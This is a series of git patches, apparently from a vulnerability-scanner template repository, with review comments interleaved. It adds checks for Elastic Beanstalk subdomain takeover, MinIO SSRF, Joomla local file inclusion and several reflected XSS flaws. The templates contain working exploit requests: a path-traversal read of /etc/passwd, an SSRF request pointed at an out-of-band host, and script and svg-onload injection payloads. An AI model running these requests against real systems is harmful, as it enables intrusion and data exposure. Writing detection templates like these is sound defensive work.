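Review bot: The region alternation `(east|west|south|northeast|southeast|central)` in the new regex has no `north`, so a CNAME in `eu-north-1` never matches and that region silently drops out of the takeover check; add it: `- \.(us|af|ap|ca|eu|me|sa)\-(east|west|south|north|northeast|southeast|central)\-[1-9]+\.elasticbeanstalk\.com`. DNS names are case-insensitive, so the pattern should also start with `(?i)` rather than assume the resolver echoes the CNAME in lower case. `condition: or` on a matcher with a single regex entry is a no-op; the rename commit further down drops it but leaves the regex itself unchanged, so the `north` gap persists in the final template.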
@@ -14,10 +14,10 @@ info: # Do not report this without claiming the CNAME. # # CLI command to verify the availability of the environment: -# aws elasticbeanstalk check-dns-availability --region {AWS_REGION} --cname-prefix {CNAME_PREFIX} +# aws elasticbeanstalk check-dns-availability --region {AWS_REGION} --cname-prefix {CNAME_PREFIX} # Example: # CNAME - 2rs3c.eu-west-1.elasticbeanstalk.com -# Command - aws elasticbeanstalk check-dns-availability --region eu-west-1 --cname-prefix 2rs3c +# Command - aws elasticbeanstalk check-dns-availability --region eu-west-1 --cname-prefix 2rs3c dns: - name: "{{FQDN}}" @@ -25,17 +25,21 @@ dns: class: inet recursion: true retries: 3 + matchers-condition: and matchers: + - type: regex name: elasticbeanstalk regex: # Only CNAMEs with region specification are hijackable. - \.(us|af|ap|ca|eu|me|sa)\-(east|west|south|northeast|southeast|central)\-[1-9]+\.elasticbeanstalk\.com condition: or + - type: word words: - "NXDOMAIN" + extractors: - type: regex group: 1 From fbc810b9a73b5bc124a798c05e3b726c08cbea00 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 14 Sep 2021 17:50:57 +0530 Subject: [PATCH 270/339] misc update --- ...ion.yaml => elasticbeantalk-takeover.yaml} | 28 +++++++++---------- 1 file changed, 13 insertions(+), 15 deletions(-) rename dns/{elasticbeantalk-takeover-detection.yaml => elasticbeantalk-takeover.yaml} (51%) diff --git a/dns/elasticbeantalk-takeover-detection.yaml b/dns/elasticbeantalk-takeover.yaml similarity index 51% rename from dns/elasticbeantalk-takeover-detection.yaml rename to dns/elasticbeantalk-takeover.yaml index 79aa08e653..8a06147859 100644 --- a/dns/elasticbeantalk-takeover-detection.yaml +++ b/dns/elasticbeantalk-takeover.yaml 
@@ -1,23 +1,24 @@ -id: elasticbeantalk-takeover-detection +id: elasticbeantalk-takeover info: - name: Elastic BeanTalk takeover detection - author: philippedelteil + name: ElasticBeanTalk takeover detection + author: philippedelteil,rotemreiss severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/147 # kudos to @m7mdharoun for sharing process details. - https://twitter.com/payloadartist/status/1362035009863880711 - https://www.youtube.com/watch?v=srKIqhj_ki8 tags: dns,takeover,aws - -# You need to claim the CNAME in AWS portal (https://aws.amazon.com/) or via AWS CLI to confirm the takeover. -# Do not report this without claiming the CNAME. -# -# CLI command to verify the availability of the environment: -# aws elasticbeanstalk check-dns-availability --region {AWS_REGION} --cname-prefix {CNAME_PREFIX} -# Example: -# CNAME - 2rs3c.eu-west-1.elasticbeanstalk.com -# Command - aws elasticbeanstalk check-dns-availability --region eu-west-1 --cname-prefix 2rs3c + additional-fields: + comments: | + Only CNAMEs with region specification are hijackable. + You need to claim the CNAME in AWS portal (https://aws.amazon.com/) or via AWS CLI to confirm the takeover. + Do not report this without claiming the CNAME. + CLI command to verify the availability of the environment: + aws elasticbeanstalk check-dns-availability --region {AWS_REGION} --cname-prefix {CNAME_PREFIX} + For example: + CNAME - 2rs3c.eu-west-1.elasticbeanstalk.com + Command - aws elasticbeanstalk check-dns-availability --region eu-west-1 --cname-prefix 2rs3c dns: - name: "{{FQDN}}" @@ -30,11 +31,8 @@ dns: matchers: - type: regex - name: elasticbeanstalk regex: - # Only CNAMEs with region specification are hijackable. - \.(us|af|ap|ca|eu|me|sa)\-(east|west|south|northeast|southeast|central)\-[1-9]+\.elasticbeanstalk\.com - condition: or - type: word words: From 5b09b9ca113aa58610d01657582b35505f195b41 Mon Sep 17 00:00:00 2001 
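Review bot: `name: ElasticBeanTalk takeover detection` misspells the AWS service, which is Elastic Beanstalk — the regex lower in this file matches `elasticbeanstalk.com` — so it should read `name: AWS Elastic Beanstalk takeover detection`. The `id` and the filename carry the same typo, and since this commit is already renaming the file it is the cheapest moment to correct `id: elasticbeanstalk-takeover` as well instead of paying for a second rename later. The first line of the moved `comments:` block, `Only CNAMEs with region specification are hijackable.`, used to sit beside the regex it explains; now that the inline comment is gone from the second hunk, a short comment next to the regex pointing at the `comments` block under `additional-fields` would keep the link.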
From: sandeep Date: Tue, 14 Sep 2021 20:15:44 +0530 Subject: [PATCH 271/339] misc update --- cves/2021/CVE-2021-21287.yaml | 24 +++++++++++++----------- 1 file changed, 13 insertions(+), 11 deletions(-) diff --git a/cves/2021/CVE-2021-21287.yaml b/cves/2021/CVE-2021-21287.yaml index 2d801cbdd7..7f5e188f12 100644 --- a/cves/2021/CVE-2021-21287.yaml +++ b/cves/2021/CVE-2021-21287.yaml @@ -6,25 +6,27 @@ info: severity: high description: MinIO is a High Performance Object Storage released under Apache License v2.0. In MinIO before version RELEASE.2021-01-30T00-20-58Z there is a server-side request forgery vulnerability. reference: + - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html - https://nvd.nist.gov/vuln/detail/CVE-2021-21287 - - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q tags: cve,cve2021,minio,ssrf,oob requests: - - method: POST - path: - - '{{BaseURL}}/minio/webrpc' - body: | - {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"} + - raw: + - | + POST /minio/webrpc HTTP/1.1 + Host: {{interactsh-url}} + Content-Type: application/json - headers: - Host: {{interactsh-url}} - Content-Type: application/json - User-Agent: Mozilla/5.0 + {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"} + matchers-condition: and matchers: + - type: status + status: + - 200 + - type: word part: interactsh_protocol words: - - "http" # Confirms the HTTP Interaction + - "http" # Confirms the HTTP Interaction \ No newline at end of file From 84abafbcf0719f2d21780fdaaefd7bc195041228 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 14 Sep 2021 20:20:56 +0530 Subject: [PATCH 272/339] Added detection template --- technologies/minio-detect.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 technologies/minio-detect.yaml 
diff --git a/technologies/minio-detect.yaml b/technologies/minio-detect.yaml new file mode 100644 index 0000000000..aab5ca4231 --- /dev/null +++ b/technologies/minio-detect.yaml @@ -0,0 +1,22 @@ +id: minio-detect + +info: + name: Minio Detection + author: pdteam + severity: info + tags: tech,minio + +requests: + - method: GET + path: + - "{{BaseURL}}/minio/login" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "MinIO Browser" \ No newline at end of file From 6e5255514dd0e04898a266dbb4f5a772d44a8891 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 14 Sep 2021 20:47:58 +0530 Subject: [PATCH 273/339] misc update --- cves/2021/CVE-2021-21287.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-21287.yaml b/cves/2021/CVE-2021-21287.yaml index 7f5e188f12..030ce0d427 100644 --- a/cves/2021/CVE-2021-21287.yaml +++ b/cves/2021/CVE-2021-21287.yaml @@ -17,16 +17,18 @@ requests: POST /minio/webrpc HTTP/1.1 Host: {{interactsh-url}} Content-Type: application/json + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + Content-Length: 76 {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"} matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: interactsh_protocol words: - - "http" # Confirms the HTTP Interaction \ No newline at end of file + - "http" # Confirms the HTTP Interaction + + - type: word + words: + - "We encountered an internal error" \ No newline at end of file From d39ba8391e30abb076b4e2046a9a094f2c38e2df Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 Sep 2021 15:20:20 +0000 Subject: [PATCH 274/339] Auto Generated CVE annotations [Tue Sep 14 15:20:20 UTC 2021] :robot: --- cves/2021/CVE-2021-21287.yaml | 5 +++++ 1 file changed, 5 insertions(+) 
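Review bot: The hard-coded `Content-Length: 76` in the raw request is brittle: it is right only because the 75-byte JSON line plus the block scalar's trailing newline happen to total 76, and any edit to the payload desynchronises it without anything failing loudly. As far as I know nuclei computes the length for raw requests unless `unsafe: true` is set, so the header is redundant at best; drop the line. The new `We encountered an internal error` body word is a version-specific message; noting in `description` which MinIO builds were observed to return it would make a later change of wording a visible maintenance item rather than a silent false negative.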
diff --git a/cves/2021/CVE-2021-21287.yaml b/cves/2021/CVE-2021-21287.yaml index 030ce0d427..0758519bac 100644 --- a/cves/2021/CVE-2021-21287.yaml +++ b/cves/2021/CVE-2021-21287.yaml @@ -10,6 +10,11 @@ info: - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html - https://nvd.nist.gov/vuln/detail/CVE-2021-21287 tags: cve,cve2021,minio,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N + cvss-score: 7.70 + cve-id: CVE-2021-21287 + cwe-id: CWE-918 requests: - raw: From 9011c7a779463d40600bc1d1ddf934f99f26b3b3 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 14 Sep 2021 20:53:58 -0300 Subject: [PATCH 275/339] Update azure-takeover-detection.yaml This will display what type of service take over is possible. --- dns/azure-takeover-detection.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml index 9f966d436d..67bee6345b 100644 --- a/dns/azure-takeover-detection.yaml +++ b/dns/azure-takeover-detection.yaml @@ -44,3 +44,8 @@ dns: - type: word words: - "NXDOMAIN" + extractors: + - type: regex + group: 1 + regex: + - "IN\tCNAME\t(.+)" From 1aaa4203ec666f49adf10583809ef0e706d1b0e6 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 15 Sep 2021 07:06:31 +0700 Subject: [PATCH 276/339] Create CVE-2010-1957.yaml --- cves/2010/CVE-2010-1957.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1957.yaml diff --git a/cves/2010/CVE-2010-1957.yaml b/cves/2010/CVE-2010-1957.yaml new file mode 100644 index 0000000000..7f16c277c4 --- /dev/null +++ b/cves/2010/CVE-2010-1957.yaml 
@@ -0,0 +1,27 @@ +id: CVE-2010-1957 + +info: + name: Joomla! Component Love Factory 1.3.4 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12235 + - https://www.cvedetails.com/cve/CVE-2010-1957 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 85c32c4cd2080f9cce4b599b91ebb531b67c369f Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:00:16 +0700 Subject: [PATCH 277/339] Create CVE-2018-12998.yaml --- cves/2018/CVE-2018-12998.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2018/CVE-2018-12998.yaml diff --git a/cves/2018/CVE-2018-12998.yaml b/cves/2018/CVE-2018-12998.yaml new file mode 100644 index 0000000000..67b81eba21 --- /dev/null +++ b/cves/2018/CVE-2018-12998.yaml 
@@ -0,0 +1,36 @@ +id: CVE-2018-12998 + +info: + name: Zoho manageengine Arbitrary Reflected XSS + author: pikpikcu + severity: medium + descreption: reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. + reference: + - https://github.com/unh3x/just4cve/issues/10 + - https://nvd.nist.gov/vuln/detail/CVE-2018-12998 + - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html + tags: cves,cve2018,zoho,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111" + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + words: + - 'Content-Type: text/html' + part: header From 796093ae5df86d2d5c19e44674cb0be5efd6338b Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:26:23 +0700 Subject: [PATCH 278/339] Create CVE-2021-37833.yaml --- cves/2021/CVE-2021-37833.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2021/CVE-2021-37833.yaml diff --git a/cves/2021/CVE-2021-37833.yaml b/cves/2021/CVE-2021-37833.yaml new file mode 100644 index 0000000000..e720ad1081 --- /dev/null +++ b/cves/2021/CVE-2021-37833.yaml 
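Review bot: `tags: cves,cve2018,zoho,xss` uses a `cves` prefix where the other CVE templates in this series use `cve` (`cve,cve2021,minio,ssrf,oob`, `cve,cve2010,joomla,lfi`), so a `-tags cve` run will skip this template; change it to `tags: cve,cve2018,zoho,xss`. The same `cves` prefix appears in CVE-2021-37833, CVE-2021-35265, CVE-2021-24364, CVE-2021-24407, CVE-2021-24342, CVE-2020-24912, CVE-2020-28351 and CVE-2019-13392 later in this series. As rendered here the body matcher is the empty string `''`, which matches every response and leaves status 200 plus `text/html` as the only evidence; if the reflected marker was lost in rendering, please confirm the file holds a non-empty value (the same rendering appears in CVE-2021-24364, CVE-2021-24407, CVE-2021-24342 and CVE-2019-13392). The `Content-Type: application/x-www-form-urlencoded` header on a bodiless GET can be removed.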
@@ -0,0 +1,36 @@ +id: CVE-2021-37833 + +info: + name: Hotel Druid 3.0.2 XSS + author: pikpikcu + severity: medium + descreption: reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands. + reference: + - https://github.com/dievus/CVE-2021-37833 + - https://nvd.nist.gov/vuln/detail/CVE-2021-37833 + tags: cves,cve2021,hotel-druid,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b">w5px3=1' + - '{{BaseURL}}/storia_soldi.php?piu17">e3esq=1' + - '{{BaseURL}}/tabella.php?jkuh3">yql8b=1' + - '{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Ef9xkbujgt24&form_availability_calendar_template=1' + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + + - type: status + status: + - 200 From 3a2eacf6b92ad2467a07b2dce6d3f662333ae844 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:31:34 +0700 Subject: [PATCH 279/339] Update CVE-2018-12998.yaml --- cves/2018/CVE-2018-12998.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-12998.yaml b/cves/2018/CVE-2018-12998.yaml index 67b81eba21..fdc71f0e37 100644 --- a/cves/2018/CVE-2018-12998.yaml +++ b/cves/2018/CVE-2018-12998.yaml 
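Review bot: The fourth path sends a complete database configuration (`T_PHPR_DB_TYPE`, `T_PHPR_DB_HOST`, `T_PHPR_DB_USER`, `T_PHPR_DB_PASS`, …) to `crea_modelli.php`; if that page persists what it receives, a detection template would be altering the target's configuration rather than observing a reflection, which is out of scope for a medium-severity XSS check. Unless the referenced PoC shows those parameters are needed for the reflection, trim that request to the parameter that is echoed, and note that the hard-coded `anno=2021` will stop matching the calendar once the year rolls over. The other three paths are enough to establish the finding on their own if they reflect.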
@@ -4,7 +4,7 @@ info: name: Zoho manageengine Arbitrary Reflected XSS author: pikpikcu severity: medium - descreption: reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. + description: reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. reference: - https://github.com/unh3x/just4cve/issues/10 - https://nvd.nist.gov/vuln/detail/CVE-2018-12998 From fde477de48b219c1d78853dd8981c2cc9e4e9edf Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:32:11 +0700 Subject: [PATCH 280/339] Update CVE-2021-37833.yaml --- cves/2021/CVE-2021-37833.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-37833.yaml b/cves/2021/CVE-2021-37833.yaml index e720ad1081..da7b18b64c 100644 --- a/cves/2021/CVE-2021-37833.yaml +++ b/cves/2021/CVE-2021-37833.yaml 
@@ -4,7 +4,7 @@ info: name: Hotel Druid 3.0.2 XSS author: pikpikcu severity: medium - descreption: reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands. + description: reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands. reference: - https://github.com/dievus/CVE-2021-37833 - https://nvd.nist.gov/vuln/detail/CVE-2021-37833 From 3ca80153b3056351663edcf48f3ba9511c98dcf1 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:36:38 +0700 Subject: [PATCH 281/339] Create CVE-2021-35265.yaml --- cves/2021/CVE-2021-35265.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 cves/2021/CVE-2021-35265.yaml diff --git a/cves/2021/CVE-2021-35265.yaml b/cves/2021/CVE-2021-35265.yaml new file mode 100644 index 0000000000..bbdb198b8a --- /dev/null +++ b/cves/2021/CVE-2021-35265.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-35265 + +info: + name: MaxSite CMS XSS + author: pikpikcu + severity: medium + description: reflected cross-site scripting (XSS) vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page. + reference: + - https://github.com/maxsite/cms/issues/414#issue-726249183 + - https://nvd.nist.gov/vuln/detail/CVE-2021-35265 + tags: cves,cve2021,maxsite,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E' + - '{{BaseURL}}/maxsite/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E' + + matchers-condition: and + matchers: + + - type: word + words: + - '">' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + + - type: status + status: + - 200 
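Review bot: In CVE-2021-35265 the body matcher `'">'` is satisfied by practically any HTML document (`<a href="x">` already contains it), so with `matchers-condition: and` the template effectively reports every 200 `text/html` page under `/page/hello/` as vulnerable. If the intended value was the reflected `"><svg/onload=...` marker and the rest was lost in rendering, please confirm; otherwise match on the unencoded form of the payload that is already in the path, e.g. `- '"><svg/onload=alert(document.domain)>'`, which only appears when the input is echoed without escaping.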
From 04ab1bb769b7737e6b19b27f049934b1791550b0 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:45:52 +0700 Subject: [PATCH 282/339] Create CVE-2021-24364.yaml --- cves/2021/CVE-2021-24364.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2021/CVE-2021-24364.yaml diff --git a/cves/2021/CVE-2021-24364.yaml b/cves/2021/CVE-2021-24364.yaml new file mode 100644 index 0000000000..f10ff32829 --- /dev/null +++ b/cves/2021/CVE-2021-24364.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-24364 + +info: + name: Jannah < 5.4.4 (XSS) + author: pikpikcu + severity: medium + description: he Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability. + reference: + - https://wpscan.com/vulnerability/1d53fbe5-a879-42ca-a9d3-768a80018382 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24364 + tags: cves,cve2021,wordpress,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275\">%27%2C%27custom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D' + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + + - type: status + status: + - 200 From 936ec94e23bf6ec502a509306070377418d001ee Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:51:50 +0700 Subject: [PATCH 283/339] Create CVE-2021-24407.yaml --- cves/2021/CVE-2021-24407.yaml | 38 +++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 cves/2021/CVE-2021-24407.yaml 
diff --git a/cves/2021/CVE-2021-24407.yaml b/cves/2021/CVE-2021-24407.yaml new file mode 100644 index 0000000000..669cda4004 --- /dev/null +++ b/cves/2021/CVE-2021-24407.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-24407 + +info: + name: Jannah < 5.4.5 - Reflected Cross-Site Scripting (XSS) + author: pikpikcu + severity: medium + description: he Jannah WordPress theme before 5.4.5 did not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action, leading to a Reflected Cross-site Scripting (XSS) vulnerability. + reference: + - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24407 + tags: cves,cve2021,wordpress,xss + +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + action=tie_ajax_search&query[]= + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + + - type: status + status: + - 200 From 643623211cee596ca12f77d2d72ae234eb81298b Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 12:02:38 +0700 Subject: [PATCH 284/339] Create CVE-2021-24342.yaml --- cves/2021/CVE-2021-24342.yaml | 38 +++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 cves/2021/CVE-2021-24342.yaml diff --git a/cves/2021/CVE-2021-24342.yaml b/cves/2021/CVE-2021-24342.yaml new file mode 100644 index 0000000000..e71b29702b --- /dev/null +++ b/cves/2021/CVE-2021-24342.yaml 
@@ -0,0 +1,38 @@ +id: CVE-2021-24342 + +info: + name: JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS) + author: pikpikcu + severity: medium + description: JNews WordPress theme before 8.0.6 did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue. + reference: + - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e + - https://nvd.nist.gov/vuln/detail/CVE-2021-24342 + tags: cves,cve2021,wordpress,xss + +requests: + - raw: + - | + POST /?ajax-request=jnews HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + lang=en_US&cat_id=6">&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67 + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + + - type: status + status: + - 200 From 9cf31a5078e59bd4cbed3c9bb168eb357970db9c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 12:03:20 +0700 Subject: [PATCH 285/339] Update CVE-2021-24364.yaml --- cves/2021/CVE-2021-24364.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24364.yaml b/cves/2021/CVE-2021-24364.yaml index f10ff32829..8d02f10378 100644 --- a/cves/2021/CVE-2021-24364.yaml +++ b/cves/2021/CVE-2021-24364.yaml 
@@ -4,7 +4,7 @@ info: name: Jannah < 5.4.4 (XSS) author: pikpikcu severity: medium - description: he Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability. + description: The Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability. reference: - https://wpscan.com/vulnerability/1d53fbe5-a879-42ca-a9d3-768a80018382 - https://nvd.nist.gov/vuln/detail/CVE-2021-24364 From 7a88129ee83a215f1207568294b97d617c3f12c3 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 12:03:37 +0700 Subject: [PATCH 286/339] Update CVE-2021-24407.yaml --- cves/2021/CVE-2021-24407.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-24407.yaml b/cves/2021/CVE-2021-24407.yaml index 669cda4004..8d87b74364 100644 --- a/cves/2021/CVE-2021-24407.yaml +++ b/cves/2021/CVE-2021-24407.yaml @@ -4,7 +4,7 @@ info: name: Jannah < 5.4.5 - Reflected Cross-Site Scripting (XSS) author: pikpikcu severity: medium - description: he Jannah WordPress theme before 5.4.5 did not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action, leading to a Reflected Cross-site Scripting (XSS) vulnerability. + description: The Jannah WordPress theme before 5.4.5 did not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action, leading to a Reflected Cross-site Scripting (XSS) vulnerability. reference: - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153 - https://nvd.nist.gov/vuln/detail/CVE-2021-24407 
@@ -18,7 +18,7 @@ requests: Accept: */* Content-Type: application/x-www-form-urlencoded - action=tie_ajax_search&query[]= + action=tie_ajax_search&query[]= matchers-condition: and matchers: From 88c319a1482eb17effe8915adea584128ddb2f32 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 12:04:51 +0700 Subject: [PATCH 287/339] Update CVE-2021-24342.yaml --- cves/2021/CVE-2021-24342.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24342.yaml b/cves/2021/CVE-2021-24342.yaml index e71b29702b..2aaf4ec9f9 100644 --- a/cves/2021/CVE-2021-24342.yaml +++ b/cves/2021/CVE-2021-24342.yaml @@ -17,7 +17,7 @@ requests: Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded - + lang=en_US&cat_id=6">&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67 matchers-condition: and From 468d4277e81c47584800bbea6269d177dd3750e0 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 12:19:07 +0700 Subject: [PATCH 288/339] Create shopizer-detect.yaml --- technologies/shopizer-detect.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 technologies/shopizer-detect.yaml diff --git a/technologies/shopizer-detect.yaml b/technologies/shopizer-detect.yaml new file mode 100644 index 0000000000..3989e78c19 --- /dev/null +++ b/technologies/shopizer-detect.yaml 
